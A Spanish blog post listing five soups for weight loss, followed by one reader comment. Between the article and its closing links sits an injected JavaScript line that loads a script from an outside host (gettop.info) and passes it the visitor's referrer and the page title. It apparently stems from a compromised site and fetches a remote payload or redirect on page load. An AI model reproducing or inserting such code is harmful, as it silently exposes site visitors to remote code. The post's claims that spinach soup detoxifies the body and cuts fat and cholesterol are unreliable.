Salud y belleza » Salud, alimentos, dieta saludable

Sopas estupendas para adelgazar

1 Comentario

La sopa es una comida muy rica y que se puede tomar de muchos ingredientes. Además, por su alto contenido en agua son ideales para adelgazar porque normalmente llevan muchas verduras. Así que para reducir la ingesta de calorías vamos a proponerte las mejores sopas para adelgazar.

sopas-para-adelgazar

- Sopa de verduras: la mejor de las sopas para perder peso y además tiene un alto contenido nutricional que viene genial para la salud de tu organismo.

sopa-de-verduras

- Sopa de minestrone: una deliciosa sopa con patatas, tomates, zanahoria, maíz y otras verduras muy saludables. Es una sopa rica en fibra que mejora tu digestión y tiene muy pocas calorías.

sopa-de-minestrone

- Sopa de tomate: es una sopa muy fácil de preparar y muy rica. Funciona muy bien como antioxidante y además tiene muy pocas grasas y calorías.

sopa-de-tomate

- Sopa de calabaza: la calabaza tiene muy pocas calorías, eso sí, tiene que gustarte este vegetal porque hay gente que no soporta su sabor. Sin embargo, tiene muchos beneficios y es ideal para perder peso. Además no contiene gluten.

sopa-de-calabaza

- Sopa de espinacas: rica en antioxidantes eliminan las sustancias que tu organismo no necesita y ayuda a depurarte. Contiene muchas vitaminas y minerales y ayuda a reducir la grasa y el colesterol de tu organismo.

sopa-de-espinacas

¿Cuál de estas sopas para adelgazar te gusta más?

s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; d.getElementsByTagName('head')[0].appendChild(s);

Más consejos de salud y belleza : , ,

One Comment »

  • begoña said:

    a mi me encanta hacer sopa para almorzar pero es que luego a las pocas horas tienes hambre porque es casi todo agua lo que estás comiendo

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.